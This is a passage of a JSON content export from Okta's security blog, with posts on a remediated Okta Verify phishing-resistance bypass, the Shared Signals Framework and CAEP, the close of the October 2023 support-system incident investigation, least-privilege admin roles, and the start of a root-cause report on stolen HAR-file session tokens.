Karl is actively involved with the identity community developing and adopting technical standards that provide the foundation for the Okta Identity Cloud.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6fixoIccP6y6XyYM36hVRj/e922b686e242a3f68bb809567d4863c9/karl-mcguiness-speaker.jpg"},"name":"Karl McGuinness","jobTitle":"Chief Product Architect, Okta","slug":"karl-mcguinness","node_locale":"en"}]},{"slug":"/articles/2024/04/okta-verify-vulnerability-disclosure-report-response-and-remediation","id":"aab26466-19e0-587b-83cb-8765e6c59b40","title":" Okta Verify Vulnerability Disclosure Report - Response and Remediation","date":"2024-04-23T22:59:10+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Summary\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has confirmed and remediated a reported Okta Verify vulnerability. No action is needed by customers, and outside of the original proof of concept Okta did not identify any evidence of attempts to exploit this vulnerability. As part of our recent Okta Secure Identity Commitment, we are communicating this remediation to customers in the spirit of transparency.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Response\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On April 5th, Okta received a report from a researcher at Persistent Security of a potential vulnerability in Okta Verify that detailed bypassing phishing resistance checks. 
Upon receipt, we initiated our vulnerability disclosure process, and upon further investigation, it was discovered that an adversary could bypass the phishing-resistant property of Okta Verify FastPass given certain parameters.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On April 8th, Okta’s Engineering team successfully identified the root cause within Okta’s backend code and created a mitigation plan. It’s important to note that the root cause did not reside within the Okta Verify application.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Vulnerability\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The details of the vulnerability are as follows.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In a phishing-resistant challenge involving a CUSTOM_URI and SSO Extension, if the user:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"only offers user verification or an approved consent prompt and additionally\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"the origin header is missing, the logic returns “true”, as the authorization intention was to approve transactions only if a user-approved consent accompanied the missing origin header.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, we incorrectly assumed that the presence of a missing origin header and an approved user 
verification (or approved consent prompt) was equal to a verified phishing resistance. To correct this, we have implemented an additional verification step to confirm that a valid origin header is present before then confirming phishing resistance. Going forward, this measure ensures that the transaction is valid and secure.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On April 9th, the fix was deployed to a development cell, and validated as effective. We then applied a hotfix to a production cell, and following an additional successful validation, the fix was rolled out to all remaining production cells on April 10th and to staging cells on April 11th. This hotfix remediated the vulnerability, with no customer follow-up action needed.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"That said, this reported vulnerability does highlight the importance of comprehensive threat models, as well as the role that manual testing can still play in developing secure components. 
Okta would like to thank Nikos Laleas and Giuseppe Trotta from the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.persistent-security.net/about-us\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Persistent Security Industries\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (PSI) Team for bringing this exploit to our attention, as well as their commitment to responsible disclosure.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Timeline\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 5, 2024 - Persistent Security contacts Okta with report\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 6, 2024 - Okta Security validates the findings\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 8, 2024 - Okta discovers root cause\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 9, 2024 - Okta deploys fix to development environment\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 9, 2024 - Okta validates fix\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 10, 2024 - Fix deployed to Production\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 11, 2024 - Fix deployed to 
Preview\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-07T20:37:12.164Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2024/04/why-cyber-heroes-need-zero-trust-caep","id":"49fbd3a8-0382-54b2-a8e4-ddc111315da0","title":"Why Cyber-heroes need a Zero Trust CAEP!","date":"2024-04-23T23:12:34+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the modern digital landscape, where threats evolve and organizational perimeters extend into the cloud, maintaining a strong security posture requires more than static defense mechanisms. 
This is where the Continuous Access Evaluation Profile (CAEP) and the Shared Signals Framework (SSF) come into play.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At the recent \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.gartner.com/en/conferences/emea/identity-access-management-uk\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Gartner Identity & Access Management Summit in London\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", Apoorva Deshpande, Okta Engineering Lead, along with other OpenID Foundation SSF Working Group members, demonstrated how these signals can be used as part of a Zero Trust approach to create policies in Okta to detect and prevent threats across technology platforms and data silos.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"3MgaaQeTOtjG7mlyF5hTrG\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Wait, doesn’t my SIEM already do this?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The OpenID Foundation Shared Signals Framework (SSF) and Security Information and Event Management (SIEM) systems play very different roles in an organization's cybersecurity strategy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Information and Event Management (SIEM) systems play a crucial role in helping analysts detect, analyze and respond to cybersecurity threats. 
Analysts stream network, application and device logs to a SIEM for aggregation, correlation and alerting on known suspicious activity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Shared Signals Framework is a method for transmitting, receiving and aggregating risk signals between applications, creating opportunities for automated policy-based actions. SSF-based CAEP events specifically allow identity practitioners to configure an exchange of risk signals between IdPs and applications related to user and session risk. The events might still be logged in the SIEM, but CAEP allows for protective controls to swing into action before detective controls kick into gear.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SSF enables real time context with trusted partners, simplifying the security stack into a cohesive service that supports secure access across a broad range of technologies and platforms using Zero Trust security principles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The main differences are:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enhanced Interoperability and Integration: SSF facilitates direct, real-time communication between various security tools and platforms within an organization’s IT ecosystem, continuously communicating to thwart attackers lateral movement across services. 
This seamless integration can sometimes be more efficient than the centralized logging and analysis approach of SIEM systems, which may require complex configuration and integration efforts to achieve similar levels of interoperability.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Standardized Signaling: By standardizing the way security signals are shared and interpreted across different systems, SSF can enhance the overall effectiveness of security measures. SIEMs, while powerful for analysis and correlation, might not inherently standardize or streamline the communication protocols between disparate security solutions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Real-Time Adaptive Response: SSF enables security solutions to respond to threats in real-time by sharing signals about detected threats or anomalies instantly. This can allow for automated, immediate responses such as isolating a compromised endpoint. In contrast, SIEMs might excel in detection and alerting but can be slower to enact automated responses due to their reliance on central processing and analysis\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scalability and Efficiency: SSF's direct signaling between tools can reduce the complexity and overhead associated with aggregating and processing vast amounts of log data, as is common with SIEM systems. 
This can be particularly advantageous in highly dynamic or cloud-native environments where the volume and velocity of data can overwhelm traditional SIEM architectures, or require numerous collectors and connectors which incur lag and costs.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cost-Effectiveness: For startups and Small to Medium Enterprise organizations, implementing and maintaining a SIEM solution can be resource-intensive, requiring dedicated hardware, software, training and personnel. In contrast, an SSF approach, leveraging cloud services and APIs for integration and communication, might offer a more cost-effective solution for organizations looking to maximize their security efficiency and budgets.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It’s important to note that SSF and SIEM serve different needs within the cybersecurity ecosystem. In many cases, the most robust security posture would benefit from leveraging both SSF and SIEM capabilities, using SSF to enhance the real-time response and operational efficiency of the security infrastructure, and SIEM to provide deep analytical insights, historical data analysis, and compliance reporting.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How is Okta championing SSF and CAEP interoperability?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recently announced the Okta Secure Identity Commitment with one of the pillars being, Raising the bar for our Industry, and Okta believes in a collaborative approach to security. 
By actively participating in SSF standardization and demonstrating interoperability with key partners, we aim to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Boost security effectiveness: Sharing enriched threat data across different solutions empowers organizations to detect and respond to threats faster and more effectively.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Simplify security operations: Eliminating vendor lock-in and streamlining data exchange reduces complexity and operational overhead for security teams.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Accelerate innovation: Fostering an open ecosystem encourages innovation and the development of more advanced security solutions.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Some key takeaways to consider when reviewing your identity strategy:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How do you evaluate user risk during sessions beyond initial access?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What challenges exist when correlating threat data across your security 
stack?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How quickly and proactively can you respond to emerging identity threats?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How do you apply the right authentication method for the data rather than one-for-all and how can you adopt adaptive authentication workflows?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How open or closed is your identity ecosystem? \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/appsofthefuture\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Do your application vendors support CAEP/SSF\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"?\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-07T20:35:09.141Z","secAuthor":[{"id":"4bd66bb8-bbb2-5ab6-895d-32c670d02166","bio":{"bio":"<p> </p><p>Stephen McDermid, CSO EMEA has led and been responsible for several enterprise-wide transformations ranging from National Government transformation projects to ISO27001 and PCI-DSS accreditation across multiple sites. He's taken his hands-on knowledge and expertise and used them to help organizations manage security across a broad range of disciplines and ensure senior stakeholders understand the risks and, more importantly, the opportunities available to their business. 
Stephen has worked with some of the largest organizations across military, banking, government, and enterprise sectors, to enable business transformation and growth. Stephen spends a lot of time on or near water, not just because of the rain; he holds a powerboat license and loves exploring the West Coast waters of Scotland.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3dK8xXUsNpD0udBFZ9FyRL/c7b20c4103a0b02e73c8167676403f89/Stephen-McDermid.png"},"name":"Stephen McDermid","jobTitle":"Regional CSO, EMEA","slug":"stephen-mcdermid","node_locale":"en"}]},{"slug":"/harfiles","id":"92829d3b-664c-551c-ad39-607b1b4f510b","title":"Okta October 2023 Security Incident Investigation Closure","date":"2024-02-08T12:34:22+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Related Posts: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/october-security-incident-recommended-actions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recommended Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - Nov 29, 2023 / \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Root Cause Analysis [RCA]\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - Nov 3, 2023 / \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/10/tracking-unauthorized-access-oktas-support-system\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Incident\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - Oct 20, 
2023\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Stroz Friedberg, a leading cybersecurity forensics firm engaged by Okta, has concluded its independent investigation of the October 2023 security incident. The conclusions of Okta’s investigation have not changed, and Stroz Friedberg has confirmed there is no evidence of further malicious activity beyond what was previously determined by Okta. The October 2023 security incident forensic report is now available to our customers and partners. While this completes Okta’s investigation of this incident, putting security first will continue to be a top priority. We will communicate further advancements on our commitment to secure identity for the industry.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"As part of our response, we engaged with law enforcement, notified regulators, published indicators of compromise (IOCs), and provided a customized impact report to affected customers. Along with this report, we shared recommendations to help mitigate possible phishing and social engineering attacks.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Additionally, Okta has taken a number of steps to review and enhance the security of the Okta Help Center. We are also changing how and when access is provisioned to customer administrators as well as that system’s data retention policy.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"While Okta’s production service was not impacted, we continue to strengthen our products and recommend configurations that make our customers more secure. 
We’ve recently announced features that allow customers to secure their administrative access in an Okta tenant, strengthen session security, and enhance location-based access controls, including:\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"unordered-list\",\"content\":[{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Zero Standing Privileges for Okta Admins: Ensure admin roles are requested, approved, and assigned to authorized users only for the duration that access is needed.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA Required for Protected Actions in Admin Console: Provide an additional layer of protection for critical actions in Okta by requiring step-up authentication for admins to perform high-impact actions.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"In Dynamic Zones, Ability to Detect and Block Requests from Anonymizers to Okta Endpoints: Protect critical assets (e.g, Admin Console, App Dashboard, others) and allow request blocking from specified VPNs, anonymous proxies, and similar.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Customers can now also apply IP binding to Okta products and Admin Console: Invalidate Okta sessions if the source IP changes during the session, which helps prevent session takeover. 
This is in addition to the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"initial remediation action for binding admin sessions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce an Allowlisted Network Zone for APIs: Restrict attackers and malware from stealing SSWS tokens, and from replaying them outside of the specified IP range in order to gain unauthorized access.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to putting security first. We are continuing to invest in and deliver enhancements that secure customers, our products and services, and our corporate systems. While we have closed this investigation, our work is not done. In partnership with our customers and others, we know that together we can raise the bar for security practices in our industry. Look for more developments to be announced in the coming weeks.\",\"marks\":[],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:39:23.677Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"<p>David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies. 
</p>\n\n<p>Prior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs. </p>\n\n<p>Bradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/articles/2023/09/go-secure-default-custom-admin-roles-it-support-staff","id":"ca7a5ff3-34ad-57a2-9759-b26dbc05dddf","title":"Go “Secure by Default” With Custom Admin Roles for IT support staff","date":"2023-09-14T20:54:01+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"The Takeaway: Creating custom roles for your help desk staff supports a “least privilege” approach.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"In late August, Okta’s Defensive Cyber Operations team \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"outlined a social engineering campaign\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in which a 
target’s IT support staff - that is, the team responsible for common help desk tasks, were tricked into resetting the authenticators of users with the most privileged roles in an organization.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the many \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"recommendations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" made in response to this event was to constrain the permissions of IT support staff in ways that prevent them from performing operations on highly privileged users. The best way to do this is to create and assign a Custom Admin Role for IT Support staff.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"As the name suggests, Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" provides the ability to create customized administrative roles with the least privileges required. 
These roles can be constrained by what tasks the administrator can perform, and what resources (users, groups, apps, workflows etc) the admin can perform those tasks in.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles can subsequently be used to remove all other administrators from the resource set assigned to your IT Support staff.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Detailed instructions are available in the following \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/assigning-custom-admin-roles-to-it-support-staff?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Knowledge Based Article\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:39:23.605Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause","id":"fd21c105-f886-5c1a-a66d-80b13dd5e5de","title":"Unauthorized Access to Okta's Support Case Management System: Root Cause and Remediation","date":"2023-11-03T09:08:48+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Executive Summary\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"We offer our apologies to those affected customers, and more broadly to all our customers that trust Okta as their identity provider. We are deeply committed to providing up-to-date information to all our customers.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"On Thursday, October 19, Okta advised customers of a security incident. Having finalized our investigation, we can confirm that from September 28, 2023 to October 17, 2023, a threat actor gained unauthorized access to files inside Okta’s customer support system associated with 134 Okta customers, or less than 1% of Okta customers. Some of these files were HAR files that contained session tokens which could in turn be used for session hijacking attacks. 
